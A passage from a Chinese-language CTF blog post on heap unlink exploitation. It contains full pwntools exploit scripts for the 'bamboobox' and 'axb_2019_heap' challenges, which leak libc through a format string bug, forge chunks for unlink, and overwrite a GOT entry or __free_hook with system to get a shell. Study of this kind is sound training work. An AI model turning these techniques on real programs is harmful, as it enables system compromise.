p64(0)+p64(0x81)+p64(fd)+p64(bk)+b&#x27;a&#x27;*0x60+p64(0x80)+p64(0x90)</span><br><span class="line">change(0,payload)</span><br><span class="line">debug(p)</span><br><span class="line">free(1)</span><br><span class="line">atoi_got=elf.got[&quot;atoi&quot;]</span><br><span class="line"></span><br><span class="line">payload1=p64(0)*3+p64(atoi_got)</span><br><span class="line">change(0,payload1)</span><br><span class="line">show()</span><br><span class="line"></span><br><span class="line">stack=u64(p.recvuntil(&quot;\x7f&quot;)[-6:].ljust(8,b&#x27;\x00&#x27;))</span><br><span class="line">log_addr(&quot;stack&quot;)</span><br><span class="line">libc_addr=stack-libc.sym[&#x27;atoi&#x27;]</span><br><span class="line">log_addr(&quot;libc_addr&quot;)</span><br><span class="line">system=libc_addr+libc.sym[&#x27;system&#x27;]</span><br><span class="line">log_addr(&quot;system&quot;)</span><br><span class="line"></span><br><span class="line">change(0,p64(system)*3)</span><br><span class="line">p.sendlineafter(&quot;choice:&quot;,b&#x27;/bin/sh\x00&#x27;)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure></div>

<h2 id="axb-2019-heap"><a href="#axb-2019-heap" class="headerlink" title="axb_2019_heap"></a>axb_2019_heap</h2><p>首先查看保护</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721203278661.png"
                      alt="1721203278661"
                ></p>
<p>保护全开</p>
<p>查看ida</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721203433198.png"
                      alt="1721203433198"
                ></p>
<p>菜单题</p>
<p>banner函数，存在格式化字符串漏洞，进行泄露程序地址和libc地址</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721205459532.png"
                      alt="1721205459532"
                ></p>
<p>查看add函数</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721203641379.png"
                      alt="1721203641379"
                ></p>
<p>delete噶不是故意，释放堆块并清空内容不存在uaf漏洞</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721203665519.png"
                      alt="1721203665519"
                ></p>
<p>看exit函数</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="C:\Users\22167\AppData\Roaming\Typora\typora-user-images\1721203723030.png"
                      alt="1721203723030"
                ></p>
<p>思路：</p>
<p>1.首先泄露程序地址和libc基地址</p>
<p>2.如何构造堆块，并覆盖后一个堆块的pre_size和size位（size低位为0）</p>
<p>3.释放使note指向note-0x18的位置，如何进行读入进行覆盖为free_hook为system</p>
<p>(因为这题开了RELRO不能覆盖got表)</p>
<p>最终的exp</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line">from tools import *</span><br><span class="line">p,e,libc=load(&quot;axb&quot;,&quot;node5.buuoj.cn:26141&quot;,&quot;./libc64/libc-2.23.so&quot;)</span><br><span class="line">context(log_level=&#x27;debug&#x27;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.sendlineafter(&quot;name: &quot;,b&#x27;%11$p--%15$p&#x27;)</span><br><span class="line">p.recvuntil(b&quot;Hello, &quot;)</span><br><span class="line">stack1=int(p.recv(14),16)</span><br><span class="line">log_addr(&quot;stack1&quot;)</span><br><span class="line">p.recvuntil(&quot;--&quot;)</span><br><span class="line">stack2=int(p.recv(14),16)</span><br><span class="line">log_addr(&quot;stack2&quot;)</span><br><span class="line">text_addr=stack1-0x1186</span><br><span class="line">log_addr(&quot;text_addr&quot;)</span><br><span class="line">libc_addr=stack2-libc.sym[&quot;__libc_start_main&quot;]-0xf0</span><br><span class="line">log_addr(&quot;libc_addr&quot;)</span><br><span class="line">free_got=libc_addr+libc.sym[&#x27;free&#x27;]</span><br><span class="line">log_addr(&quot;free_got&quot;)</span><br><span class="line">free_plt=text_addr+0x8a0</span><br><span class="line">log_addr(&quot;free_plt&quot;)</span><br><span class="line">system=libc_addr+libc.sym[&quot;system&quot;]</span><br><span class="line">log_addr(&quot;system&quot;)</span><br><span class="line">free1=libc_addr+libc.sym[&#x27;__free_hook&#x27;]</span><br><span class="line">log_addr(&quot;free1&quot;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def add(id,size,content):</span><br><span class="line">    p.sendlineafter(&quot;option:&quot;,&#x27;1&#x27;)</span><br><span class="line">    p.sendlineafter(&quot;(0-10):&quot;,str(id))</span><br><span class="line">    p.sendlineafter(&quot;size:&quot;,str(size))</span><br><span class="line">    p.sendlineafter(&quot;content: &quot;,content)</span><br><span class="line"></span><br><span class="line">def dele(id):</span><br><span class="line">    p.sendlineafter(&quot;option:&quot;,&#x27;2&#x27;)</span><br><span class="line">    p.sendlineafter(&quot;index:&quot;,str(id))</span><br><span class="line"></span><br><span class="line">def show():</span><br><span class="line">    p.sendlineafter(&quot;option:&quot;,&#x27;3&#x27;)</span><br><span class="line"></span><br><span class="line">def exit(id,content):</span><br><span class="line">    p.sendlineafter(&quot;option:&quot;,&#x27;4&#x27;)</span><br><span class="line">    p.sendlineafter(&quot;index:&quot;,str(id))</span><br><span class="line">    p.sendlineafter(&quot;content: &quot;,content)</span><br><span class="line"></span><br><span class="line">target=0x0202060+text_addr</span><br><span class="line">fd=target-0x18</span><br><span class="line">bk=target-0x10</span><br><span class="line">add(0,0x98,&quot;aaaa&quot;)</span><br><span class="line">add(1,0x98,&quot;bbbb&quot;)</span><br><span class="line">add(2,0x98,b&quot;/bin/sh\x00&quot;)</span><br><span class="line"></span><br><span class="line">log_addr(&quot;target&quot;)</span><br><span class="line">log_addr(&quot;fd&quot;)</span><br><span class="line">log_addr(&quot;bk&quot;)</span><br><span class="line"></span><br><span class="line">payload=p64(0)+p64(0x90)+p64(fd)+p64(bk)+b&#x27;a&#x27;*0x70+p64(0x90)+p64(0xa0)</span><br><span class="line">exit(0,payload)</span><br><span class="line"></span><br><span class="line">dele(1)</span><br><span class="line">debug(p)</span><br><span class="line">exit(0,p64(0)*3+p64(free1)+p64(0x8))</span><br><span class="line">exit(0,p64(system))</span><br><span class="line">dele(2)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div>


        </div>

        
            <div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
                <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> </li>
        <li><strong>Author:</strong> NEWYM</li>
        <li><strong>Created at
                :</strong> 2024-07-25 17:10:48</li>
        
            <li>
                <strong>Updated at
                    :</strong> 2024-07-25 17:08:57
            </li>
        
        <li>
            <strong>Link:</strong> https://newym.github.io/2024/07/25/unlink/
        </li>
        <li>
            <strong>
                License:
            </strong>
            

            
                This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a>.
            
        </li>
    </ul>
</div>

            </div>
        

        

        

        
            <div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
                
                
                    <div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="next"
                        rel="next"
                        href="/2024/07/11/%E5%85%B3%E4%BA%8E%E6%A0%88%E6%BA%A2%E5%87%BA/"
                        >
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item"></span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        


        
            <div class="comment-container px-2 sm:px-6 md:px-8 pb-8">
                <div class="comments-container mt-10 w-full ">
    <div id="comment-anchor" class="w-full h-2.5"></div>
    <div class="comment-area-title w-full my-1.5 md:my-2.5 text-xl md:text-3xl font-bold">
        Comments
    </div>
    

        
            
    <div id="waline"></div>
    <script type="module" data-swup-reload-script>
      import { init } from '/js/libs/waline.mjs';

      function loadWaline() {
        init({
          el: '#waline',
          serverURL: 'https://example.example.com',
          lang: 'zh-CN',
          dark: 'body[class~="dark-mode"]',
          reaction: false,
          requiredMeta: ['nick', 'mail'],
          emoji: [],
          recaptchaV3Key: "wasd",
          
        });
      }

      if (typeof swup !== 'undefined') {
        loadWaline();
      } else {
        window.addEventListener('DOMContentLoaded', loadWaline);
      }
    </script>



        
    
</div>

            </div>
        
    </div>

    
        <div class="toc-content-container">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title"></div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#unlink"><span class="nav-text">unlink</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#bamboobox"><span class="nav-text">bamboobox</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#axb-2019-heap"><span class="nav-text">axb_2019_heap</span></a></li></ol></li></ol>

    </div>
</div>
        </div>
    
</div>



                

            </div>

            

        </div>

        <div class="main-content-footer">
            <footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2024&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">NEWYM</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        3 posts in total
                    </span>
                    
                </p>
            
        </div>
        
            <script data-swup-reload-script src="https://cn.vercount.one/js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">VISITOR COUNT</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">TOTAL PAGE VIEWS</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.6.4</a></span>
        </div>
        
        
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
            <li class="go-comment">
                <i class="fa-regular fa-comments"></i>
            </li>
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    

</main>


    
<script src="/js/libs/Swup.min.js"></script>

<script src="/js/libs/SwupSlideTheme.min.js"></script>

<script src="/js/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>







<script src="/js/tools/imageViewer.js" type="module"></script>

<script src="/js/utils.js" type="module"></script>

<script src="/js/main.js" type="module"></script>

<script src="/js/layouts/navbarShrink.js" type="module"></script>

<script src="/js/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/layouts/categoryList.js" type="module"></script>





    
<script src="/js/tools/codeBlock.js" type="module"></script>




    
<script src="/js/layouts/lazyload.js" type="module"></script>




    
<script src="/js/tools/runtime.js"></script>

    
<script src="/js/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js" type="module"></script>









<div class="post-scripts" data-swup-reload-script>
    
        
<script src="/js/tools/tocToggle.js" type="module"></script>

<script src="/js/layouts/toc.js" type="module"></script>

<script src="/js/plugins/tabs.js" type="module"></script>

    
</div>


</body>
</html>
